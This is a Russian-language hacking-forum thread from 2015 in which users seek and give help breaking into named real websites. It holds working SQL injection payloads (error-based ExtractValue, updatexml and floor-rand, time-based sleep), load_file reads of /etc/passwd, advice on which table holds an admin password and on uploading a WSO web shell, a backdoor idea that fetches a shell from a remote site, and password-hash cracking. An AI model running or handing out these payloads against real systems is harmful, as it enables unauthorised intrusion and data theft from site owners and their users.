HTTP/1.1 500 Internal Server Error Server: nginx/1.9.4 Date: Wed, 30 Sep 2015 08:24:41 GMT Content-Type: text/html Content-Length: 1500 Connection: keep-alive Keep-Alive: timeout=30 X-Powered-By: PHP/5.4.44

.


В Acunetix есть HTTP Editor, там будет id_goods=1, через XPATH


Code:
csrf_ytse_token=01cc4a2e39c048f58f725bfe26e5d57c&failpage=http://steamplay.ru
/&goods_title=BRILLIANT%20STEAM%20%d0%ba%d0%bb%d1%8e %d1%87%20%2b%5b
%20CS%20GO%20Arma%20DAYZ%20GTA%20%5d%2b%20%d0%9f%d 0%9e%d0%94%d0%90
%d0%a0%d0%9a%d0%98&id_agent=390191&id_goods=1'or(ExtractValue(0x3a,concat(0x3a,(selec t version()))))='&price=15&thumbnail=1910800.jpg&token=27091&type_curr=WMR

XPATH syntax error: ':5.6.26-74.0-beget-log'

cheebeez
01.10.2015, 00:39
[DEL 33]

RedFern.89
01.10.2015, 01:51
Возможно ли раскрутить?


Code:
http://prodota.ru/news/?p=\

ghost8
01.10.2015, 03:40
возможно,каков вопрос-такой ответ

Дельный совет чуваки,сначало пробуйте методом проб и ошибок,потом задавайте вопрос,это для вас же будет лучше,больше поймте

XAMEHA
01.10.2015, 03:47
RedFern.89 said:
↑ (https://antichat.live/posts/3896418/)

Code:
***

Возможно ли раскрутить?


Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор:


Code:
PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))

https://rdot.org/forum/showthread.php?t=60&page=3


RedFern.89 said:
↑ (https://antichat.live/posts/3897121/)
Возможно ли раскрутить?

Code:
http://prodota.ru/news/?p=\



Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого:


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20'

Смело считайте, что там ничего нет. Эти инъекции стабильно появляются у нас в теме раз в неделю.

cheebeez
01.10.2015, 13:48
[DEL 35]

Sice54
01.10.2015, 17:47
Доброго времени суток друзья, пытаюсь найти что-то интересно и вывести ошибки на сайте.

Подставляю кавычку в параметр page, он отображает эту ковычку с обратным слешем.

ventilyatory-c-904_26.html?page=2'&filter_id=287

На определенных страницах, пишет "Интернет-магазин закрыт на техническое обслуживание, заходите позже!"

ventilyatory-c-904_26.html?ppp=50'

Подскажите пожалуйста, можно как-нибудь вывести ошибку в итоге ? И что это за случай ?

Заранее спасибо.

cheebeez
01.10.2015, 20:11
[DEL 38]

ButilkaSoka
02.10.2015, 00:04
ХЕЛП

если


Code:
'and extractvalue(null,concat(0x3a,(select concat(mid(КОЛОНКА,1,64)) from ТАБЛИЦА limit 0,1)))='

то

You can't specify target table 'ТАБЛИЦА' for update in FROM clause

cheebeez
02.10.2015, 00:48
[DEL 39]

ButilkaSoka
02.10.2015, 00:57
cheebeez said:
↑ (https://antichat.live/posts/3897583/)
Говорит, что нельзя делать одновременно апдэйт и селект к одной колонке.


Опечатался,

You can't specify target table 'ТАБЛИЦА' for update in FROM clause

faza02
02.10.2015, 16:24
SaNDER said:
↑ (https://antichat.live/posts/3897781/)
тебе уже ответили .
------------------------------------------------------------
Мой вопрос .
Где находится админка по адреcсу good-steam.ru ?
P.S просто у меня вот это есть

Code:

Полюбому к админке .



это настройки для подключения к бд

Konqi
02.10.2015, 17:59
SaNDER said:
↑ (https://antichat.live/posts/3897810/)
И что мне это не как не пригодится? .


ищи интерфейс для подключения к БД (PMA, Adminer, etc), или попробуй подключиться удаленно. так же пробуй эти данные к другим сервисам, например FTP (бывает что совпадают)

cheebeez
03.10.2015, 01:42
[DEL 52]

Sharingan
04.10.2015, 18:30
Здравствуйте, имеется компьютер на windows xp (другой есть на windows server 2012), на нем есть RDP, netBios. Получить в NetBios список ресурсов получилось лишь пользовательский, хотя xSpider смог получить все:

сборник - пользовательский

IPC$ (Удаленный IPC) - pipe по умолчанию

D$ (Стандартный общий ресурс) - диск по умолчанию

ADMIN$ (Удаленный Admin) - диск по умолчанию

C$ (Стандартный общий ресурс) - диск по умолчанию

Подключается лишь к сборнику. Остальное - не получается null login не работает.

Получил список пользователей, я так понял netBios имена, это пользователи windows, вопрос, теперь только брутом RDP брать? Нет ли каких уязвимостей? Поиском особо ничего не нашел. По данной теме. Может еще есть советы по netBios

AlexG
05.10.2015, 09:27
SaNDER said:
↑ (https://antichat.live/posts/3898652/)
Не проще ли заинжектить прогой,хэвидж всё вывел .

Code:
Target: http://www.fimca.com.br/pagina.asp?id=-11%20union%20select%201,2,3,concat_ws%280x3a,table _name,column_name%29,5,6%20from%20information_sche ma.columns
Host IP: 191.252.45.189
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL
Resp. Time(avg): 7342 ms
Current User: fimca@191.252.45.189
Sql Version: 5.1.54-rel12.6-log
Current DB: fimca
System User: fimca@191.252.45.189
Host Name: hm7092
Installation dir: /usr/
DB User: 'fimca'@'%'
Data Bases: information_schema
fimca

Админка в /admin,но без нужных прав не пустят(403 Forbbiden) .


Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?

UPD. Закрыто, ниже frank ответил.

frank
05.10.2015, 11:17
AlexG said:
↑ (https://antichat.live/posts/3898725/)
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?


http://raz0r.name/obzory/group_concat/

kingbeef
05.10.2015, 11:48
AlexG said:
↑ (https://antichat.live/posts/3898725/)
Проще. Но хочется научиться и руками. Очень пригодится там, где проги не могут. И вопрос сюда же кину - возникло ограничение от group_concat в 1024 символа - его можно обойти? Что бы вообще все вытащить одним запросом? Или только лимитом перебирать по порядку - таблица, колонка, содержимое?
UPD. Закрыто, ниже frank ответил.


/threads/425320/ (https://antichat.live/threads/425320/)

XAMEHA
06.10.2015, 02:29
Полный список всех методов обхода сейчас приведен здесь: https://rdot.org/forum/showthread.php?t=2860 (5: group_concat, benchmark, @, insert, replace).

Наиболее удобный в стандартной ситуации способ - 3.

Br@!ns
06.10.2015, 17:14
http://mariin.ru/index.php?q=12'

www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/user()),+1,+63),+FLOOR(RAND(0)*2)))/* (http://www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/user()),+1,+63),+FLOOR(RAND(0)*2)))/*)

Нужно узнать префикс таблиц, чтоб вытащить админов. cms дырявая, но 4 версия mysql всему мешает. Рес оч нужный, прошу помоч)

PROCEDURE ANALYSE() заиспользовать не получилось, мб не правильно делаю

Shubka75
07.10.2015, 02:30
vikler said:
↑ (https://antichat.live/posts/3899404/)

Code:
http://mmp.nl/openfoto.asp?foto=453096142 AND 1=1&Weergave=Liggend&tabel=sportbeelden

Не могу вытащить ничего sqlmap'ом - Oracle вроде как но
[ERROR] unable to retrieve the number of databases


Там не Oracle, а Microsoft Access.

Valer4ik
07.10.2015, 13:46
Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,

справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,

если запрос повторить, вылазит ошибка.

MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'

query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')

POST /apatity/business-internet/ HTTP/1.1

Host: karelia.pro

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://karelia.pro/apatity/business-internet/

Cookie: __utma=86736642.1434525950.1444154760.1444207012.1 444209648.5; __utmz=86736642.1444154760.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); PHPSESSID=bc74f0fe64381cab78e74ac0e4d67963; __utmb=86736642.2.10.1444209648; __utmc=86736642; __utmt=1

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 140

name=%C8%ED%ED%E0&city=%C0%EF%E0%F2%E8%F2%FB&street=%CC%FB%EB%EA%E0&house=65&FIO=%C3%F0%F3%F8%E5%E2%F1%EA%E0%FF&phone=3336324&info=&send=%A0

не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только

false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.

Можно это как то раскрутить?

BabaDook
07.10.2015, 16:14
Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции"

и по реализации. какие отличия, минусы, плюсы. Спасибо.

grimnir
07.10.2015, 16:18
BabaDook said:
↑ (https://antichat.live/posts/3899615/)
Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции"
и по реализации. какие отличия, минусы, плюсы. Спасибо.


http://kaoticcreations.blogspot.com/2013/10/battling-windows-mysql-from-root-to.html

http://kaoticcreations.blogspot.com/2013/10/battling-windows-mysql-from-root-to_19.html

AlexG
09.10.2015, 07:21
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -


Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))

для работы с другими базами (как перебрать имена всех баз)?

qaz
09.10.2015, 09:12
AlexG said:
↑ (https://antichat.live/posts/3900274/)
для работы с другими базами (как перебрать имена всех баз)?


select table_schema from information_schema.tables limit 1,1

kingbeef
09.10.2015, 09:54
AlexG said:
↑ (https://antichat.live/posts/3900274/)
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -

Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))

для работы с другими базами (как перебрать имена всех баз)?


select schema_name from information_schema.schemata limit 0,1

Waki
09.10.2015, 12:16
нашел blind sql, но при проверки привилегий показывает USAGE, можно только дамп или есть еще варианты?

XAMEHA
09.10.2015, 12:21
AlexG said:
↑ (https://antichat.live/posts/3900274/)
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -

Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))

для работы с другими базами (как перебрать имена всех баз)?


Вектор объединения значений для extractvalue:

https://rdot.org/forum/showthread.php?t=2860


Code:
extractvalue(1, concat(0x3A, mid((X), Y, 31)))
X = SELECT convert(max(binary reverse(insert(0x3A, 1, 0, reverse(concat(schema_name, 0x0A))))), char(1000000)) FROM information_schema.schemata

Где Y = 1 + I * 31, i = 0, 1, ...

Но советую вам взять запрос из той темы, через него вы сразу получите и имена всех баз, и имена всех таблиц, и имена всех колонок.


Valer4ik said:
↑ (https://antichat.live/posts/3899568/)
Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,
справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,
если запрос повторить, вылазит ошибка.
MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'

query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')
...
не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только
false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.
Можно это как то раскрутить?


Скули нет. Второй столбец в таблице business_logs является первичным ключем. Он обязан содержать уникальное значение. Так как туда заносятся текущая дата и время, этого не происходит. Вы же выполняете более чем 1 запрос в секунду? Интересно, как сайт вообще работал.

vikler
09.10.2015, 17:59
Code:
http://watercorpimagelibrary.com.au

Какой шелл сюда лить? В админке заливка изображений

qaz
09.10.2015, 18:39
vikler said:
↑ (https://antichat.live/posts/3900500/)
Какой шелл сюда лить?


а есть варианты? лей wso

faza02
09.10.2015, 20:08
qaz said:
↑ (https://antichat.live/posts/3900519/)
а есть варианты? лей wso


варианты есть. если там java, то на wso2.php ему будет плевать.


vikler said:
↑ (https://antichat.live/posts/3900500/)

Code:
http://watercorpimagelibrary.com.au

Какой шелл сюда лить? В админке заливка изображений


нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.

vikler
10.10.2015, 01:35
yarbabin said:
↑ (https://antichat.live/posts/3900548/)
варианты есть. если там java, то на wso2.php ему будет плевать.
нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.


на оваспе - это где?

BabaDook
10.10.2015, 03:51
XAMEHA said:
↑ (https://antichat.live/posts/3897143/)
Вероятно инъекция в LIMIT. Попробуйте применить соответствующий вектор:

Code:
PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))

https://rdot.org/forum/showthread.php?t=60&page=3
Функционал, преобразующий номер страницы в числа LIMIT-ов, никогда не был и не будет уязвим к атакам типа SQLi. Если вы видете в ответе что-то вроде этого:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20'

Смело считайте, что там ничего нет. Эти
инъекции
стабильно появляются у нас в теме раз в неделю.


То есть


PHP:
SELECT*FROM ru_video WHERE dateQ №1064:You have an error in your SQL syntax;check the manual that corresponds to your MySQL serve r versionforthe right syntax tousenear'-20,20'at line 1

можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит

faza02
10.10.2015, 12:10
BabaDook said:
↑ (https://antichat.live/posts/3900654/)
То есть

PHP:
SELECT*FROM ru_video WHERE dateQ №1064:You have an error in your SQL syntax;check the manual that corresponds to your MySQL serve r versionforthe right syntax tousenear'-20,20'at line 1

можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит


пару страниц назад XAMEHA писал по этому поводу. ничего не получится

BabaDook
10.10.2015, 19:29
yarbabin said:
↑ (https://antichat.live/posts/3900702/)
пару страниц назад XAMEHA писал по этому поводу. ничего не получится


Спасибо, так и думал

ButilkaSoka
10.10.2015, 23:47
хелп.

сканер нашёл blind sql. Что делать с url такого типа?

если менять значения sleep, то ответ изменяется в соответствии со значениями. sleep(6)=6 сек.


Code:
_ttp://megakeys.ru/news/if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

куда копать в таком случае?

kacergei
11.10.2015, 08:59
Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел

Как узнать путь?

Доп. Информация: http://pastebin.com/ppPSZ4FH

P.S>Ошибок не выводит на сайте

faza02
11.10.2015, 13:16
kacergei said:
↑ (https://antichat.live/posts/3901018/)
Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел
Как узнать путь?
Доп. Информация:
http://pastebin.com/ppPSZ4FH
P.S>Ошибок не выводит на сайте


конфиги веб сервера

kacergei
11.10.2015, 15:01
yarbabin said:
↑ (https://antichat.live/posts/3901087/)
конфиги веб сервера


Перепробывал различные пути (почти все) с прикрепленной темы тут на форуме (Default *log, *conf files locations (https://antichat.live/threads/324564/)), так же на rdot'e смотрел, а может быть такое что с локалки тянуться файлы?

WallHack
11.10.2015, 18:18
Кручу error-based руками

Такой запрос возвращает данные из колонки username


Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1

Можно вывести сразу id, username ?

Waki
11.10.2015, 18:39
Code:
http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC



Code:
Parameter: srrazdel (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC

Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE

MaxFast
11.10.2015, 18:49
WallHack said:
↑ (https://antichat.live/posts/3901237/)
Кручу error-based руками
Такой запрос возвращает данные из колонки username

Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1

Можно вывести сразу id, username ?


select id,0x3a,username from users limit 0,1

WallHack
11.10.2015, 19:33
MaxFast said:
↑ (https://antichat.live/posts/3901252/)
select id,0x3a,username from users limit 0,1


Выводит: Operand should contain 1 column(s)


Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1

faza02
11.10.2015, 20:14
WallHack said:
↑ (https://antichat.live/posts/3901266/)
Выводит: Operand should contain 1 column(s)

Code:
site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1



объедините в concat

Br@!ns
11.10.2015, 20:26
Waki said:
↑ (https://antichat.live/posts/3901248/)

Code:
http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC


Code:
Parameter: srrazdel (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC

Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE


зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php

Waki
11.10.2015, 21:34
Br@!ns said:
↑ (https://antichat.live/posts/3901288/)
зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php


спасибо, могу узнать о ваших методах? довольно быстро получили собрали необходимую информацию.

Br@!ns
12.10.2015, 04:31
Waki said:
↑ (https://antichat.live/posts/3901320/)
спасибо, могу узнать о ваших методах? довольно быстро получили собрали необходимую информацию.


все стандартно, методом перебора интересных названий таблиц. Только скулю другую нашел, с выводом

xivi00
12.10.2015, 12:05
в папке etc есть файлы

13107206.passwd

13240132.passwd

diraccess

система Linux sh3.ispcluster.com 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u3 x86_64

В файле есть ссылка перейдя по ней просит ввести логин и пасс через яваскрипт в файле 13107206.passwd вот такая инфа

384:$1$wN4OprQ0$OASVwu4Qs6Wc5YNQPRv/q.

как я понял первое пользователь второе пароль в хеше, я правельно понял?

И как расшифровать этот хеш или подменить!

faza02
12.10.2015, 12:47
xivi00 said:
↑ (https://antichat.live/posts/3901514/)
в папке etc есть файлы
13107206.passwd
13240132.passwd
diraccess
система Linux sh3.ispcluster.com 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u3 x86_64
В файле есть ссылка перейдя по ней просит ввести логин и пасс через яваскрипт в файле 13107206.passwd вот такая инфа
384:$1$wN4OprQ0$OASVwu4Qs6Wc5YNQPRv/q.
как я понял первое пользователь второе пароль в хеше, я правельно понял?
И как расшифровать этот хеш или подменить!


это md5(Unix). cmd5.ru

xivi00
12.10.2015, 13:03
Очень печально но его там нет( можете помочь расшифровать?

winstrool
12.10.2015, 13:21
xivi00 said:
↑ (https://antichat.live/posts/3901533/)
Очень печально но его там нет( можете помочь расшифровать?


/forums/76/ (https://antichat.live/forums/76/) здесь тебе возможно помогут!

faza02
12.10.2015, 16:07
так если можете изменять файл, подмените пароль или вовсе удалите.

sysjuk
12.10.2015, 20:20
Есть форма редактирование шаблона из админ панели, когда я вставляю допусти код "" он его коверкает и получается ошибка, "Parse error: syntax error, unexpected '[', expecting ')' in /index.php on line 1" и при следующем редактировании шаблона он отображается уже как ""

Как можно обойти? Возможно данный вопрос уже решался, но найти почему-то не смог. Спасибо заранее всем ответившим.

Добавлю, код исполняется нормально

OxoTnik
12.10.2015, 21:12
sysjuk said:
↑ (https://antichat.live/posts/3901706/)
Есть форма редактирование шаблона из админ панели, когда я вставляю допусти код "" он его коверкает и получается ошибка, "Parse error: syntax error, unexpected '[', expecting ')' in /index.php on line 1" и при следующем редактировании шаблона он отображается уже как ""
Как можно обойти? Возможно данный вопрос уже решался, но найти почему-то не смог. Спасибо заранее всем ответившим.
Добавлю, код исполняется нормально


Возможно сервер блокирует system используй другие. либо в ЛС отпиши, В общем решаемо.

Sharingan
13.10.2015, 17:37
Кто знает есть подробности об этой уязвимости. Есть ли эксплойты? по интернету ничего не нашел, уязвимость вроде критическая.



nginx SPDY heap buffer overflow

Описание:

A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the ngx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file

masanya
14.10.2015, 17:32
есть phpMyAdmin 2.11.11.3 Documentation, не получаеться взломать phpmyadmin, уже перепробовал все что есть в сети

кто может помочь?

dexspace
14.10.2015, 18:55
http://www.veles.km.ua/'"

выдаёт


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1
query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1;

сайт уязвим, но havij не может выдрать имя базы.

сейчас сканю sqlmap

есть идеи?

AlexG
14.10.2015, 20:03
dexspace said:
↑ (https://antichat.live/posts/3902596/)
http://www.veles.km.ua/
'"
выдаёт

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1
query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1;

сайт уязвим, но havij не может выдрать имя базы.
сейчас сканю sqlmap
есть идеи?


Руки рулят


Code:
http://www.veles.km.ua/' and (select 1 from (Select count(*),Concat((select version()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) --+

Kirza
15.10.2015, 23:08
Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres

Вопрос:

1 - Есть ли возможность - создать из phpmyadmin SMTP сервер

2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/

Спасибо.

faza02
15.10.2015, 23:43
Kirza said:
↑ (https://antichat.live/posts/3903089/)
Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres
Вопрос:
1 - Есть ли возможность - создать из phpmyadmin SMTP сервер
2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/
Спасибо.


1. Если file_priv, то можно постепенно поднимать права до RCE, а там уже делать, что хочется.

2. Только путем чтения конфигов (https://rdot.org/forum/showthread.php?t=741) или вариант выше

-0x00-
15.10.2015, 23:52
Доброе время суток.

Я конечно повторяюсь, но потерял тему с этим вопросом.

Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?

faza02
16.10.2015, 00:44
-0x00- said:
↑ (https://antichat.live/posts/3903102/)
Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?


http://php.net/manual/ru/function.file-put-contents.php

winstrool
16.10.2015, 00:51
-0x00- said:
↑ (https://antichat.live/posts/3903102/)
Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?


Вы наверное про эту тему? /threads/307894/ (https://antichat.live/threads/307894/) - Не стандартные способы заливки шеллов

Alaich
16.10.2015, 02:48
Есть доступ к mongodb вроде 2.4 , возможно как-то получить доступ к файлам сайта или залить шел ?

Подключаюсь через Robomongo

aldemko
16.10.2015, 13:27
Доброго времени суток

Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития

на примере уязвимости:


Code:
http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--

каким образом можно раскрыть абсолютный путь сайта ?

к примеру все файлы из etc читаются.

а как перейти к файлу httpd.conf

или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?

большое спасибо

OxoTnik
16.10.2015, 14:33
aldemko said:
↑ (https://antichat.live/posts/3903247/)
Доброго времени суток
Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития
на примере уязвимости:

Code:
http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--

каким образом можно раскрыть абсолютный путь сайта ?
к примеру все файлы из etc читаются.
а как перейти к файлу httpd.conf
или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?
большое спасибо


http://wiki.apache.org/httpd/DistrosDefaultLayout Изучи данный материал в помощь.

Так же там mysql root узнать пути с ссылкой выше не проблема, и залиться тоже.

OxoTnik
16.10.2015, 15:15
RedFern.89 said:
↑ (https://antichat.live/posts/3903294/)

Code:
http://prodota.ru/news/
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd1514435274 42; session_id=1;

уязвим параметр session_id, дальше базы дело не идет? инъекция time based, поможет кто?


Что значит дальше базы дело не идёт? легко крутится через error based

Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd1514435274 42; session_id=1'or(select*from(select(name_const(vers ion(),1)),name_const(version(),1))a)and(1)='1


Code:
Ошибка базы данных. MySQL пишет:Duplicate column name '5.6.25-73.1-log'

aldemko
16.10.2015, 18:21
OxoTnik said:
↑ (https://antichat.live/posts/390/)
http://wiki.apache.org/httpd/DistrosDefaultLayout
Изучи данный материал в помощь.
Так же там mysql root узнать пути с ссылкой выше не проблема, и залиться тоже.


спасибо

извини что беспокою

перепробовал все команды которые в том списке - точнее пути

прописывал

полный путь мне так и не вывело

root я уже получил через sqlmap и папки имеющие права записи тоже нашел.

осталось путь указать в sqlmap куда залиться, а пути у меня нет

пожалуйста подскажи не конкретный путь а что именно может в моем примере вывести абсолютный путь

спасибо

PS Там ось Gentoo

просто через sqlmap

я не могу скачать файл

/etc/apache2/httpd.conf

